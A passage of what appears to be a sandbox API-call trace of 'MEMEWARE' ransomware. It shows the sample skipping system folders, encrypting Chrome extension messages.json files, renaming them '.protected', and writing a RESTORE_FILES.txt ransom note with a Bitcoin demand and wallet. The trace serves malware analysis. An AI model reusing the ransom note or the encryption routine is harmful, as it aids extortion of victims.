2018") returned 177 [0083.375] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.375] CloseHandle (hObject=0x164) returned 1 [0083.375] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.375] lstrcmpiW (lpString1="bn", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned 150 [0083.376] lstrcmpW (lpString1="bn", lpString2=".") returned 1 [0083.376] lstrcmpW (lpString1="bn", lpString2="..") returned 1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*") returned 152 [0083.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.376] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\.") returned 152 [0083.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\..") returned 153 [0083.376] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.376] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.377] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.377] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.380] CloseHandle (hObject=0x168) returned 1 [0083.380] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected") returned 174 [0083.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected")) returned 1 [0083.381] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.381] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.381] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\RESTORE_FILES.txt") returned 168 [0083.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.382] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.382] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.383] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.383] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.383] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.383] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.383] CloseHandle (hObject=0x164) returned 1 [0083.385] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0083.385] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned 150 [0083.385] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0083.385] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0083.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*") returned 152 [0083.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\.") returned 152 [0083.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.385] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.386] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.386] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.386] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\..") returned 153 [0083.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.386] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.386] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.386] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.386] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.387] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.394] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.395] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.395] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.395] CloseHandle (hObject=0x168) returned 1 [0083.398] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected") returned 174 [0083.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected")) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.399] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\RESTORE_FILES.txt") returned 168 [0083.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.399] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.400] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.400] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.400] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.400] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 